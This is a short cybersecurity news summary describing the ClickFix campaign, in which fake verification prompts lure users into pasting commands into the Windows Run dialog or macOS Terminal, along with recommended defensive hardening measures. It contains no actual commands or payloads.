New ClickFix Attack Exploits Windows Run Dialog and macOS Terminal to Deploy Malware

•March 26, 2026

GBHackers On Security•Mar 26, 2026

Why It Matters

ClickFix shifts the attack surface from browsers to trusted OS tools, making detection harder and exposing organizations that allow unrestricted command execution to high‑risk compromise.

Key Takeaways

•ClickFix exploits native OS utilities, bypassing browser defenses
•Five clusters impersonate QuickBooks, Booking.com, Zillow, etc.
•Payloads run in memory, leaving minimal forensic artifacts
•Obfuscated PowerShell and curl commands evade endpoint controls
•Mitigations require policy hardening of Run, PowerShell, Terminal

Pulse Analysis

The rise of ClickFix reflects a broader shift in cyber‑crime toward living‑off‑the‑land techniques that weaponize trusted system binaries. By coercing users to copy‑paste commands into Windows Run, PowerShell, or macOS Terminal, attackers sidestep browser sandboxing and exploit the inherent trust placed in native utilities. This approach reduces reliance on zero‑day exploits and enables rapid campaign redeployment on fresh domains, as seen in the five clusters tracked since 2024. For defenders, the challenge lies in distinguishing legitimate administrative actions from malicious prompts that appear as routine verification steps.

From a defensive standpoint, traditional indicator‑based blocking is insufficient against ClickFix. The attacks leverage heavily encoded strings that are decoded at runtime, and the final payloads execute entirely in memory, leaving scant disk evidence. Organizations should therefore adopt behavioral controls: enforce PowerShell Constrained Language Mode, apply AppLocker or Windows Defender Application Control policies to restrict script execution, and implement MDM‑driven restrictions on macOS Terminal usage. Continuous monitoring of HTML content hashes, DOM signatures, and brand‑specific image assets—capabilities offered by platforms like Recorded Future—can surface new ClickFix domains before they reach end users.

Looking ahead, the persistence of ClickFix is tied to the prevalence of unrestricted command‑line access in corporate environments. As attackers incorporate browser fingerprinting and adaptive lures, the social‑engineering component will become increasingly sophisticated, demanding robust user education alongside technical safeguards. Enterprises that proactively harden native shells, integrate real‑time threat intelligence, and conduct regular phishing simulations will be better positioned to neutralize this low‑complexity, high‑return vector that is set to dominate initial‑access tactics through 2026.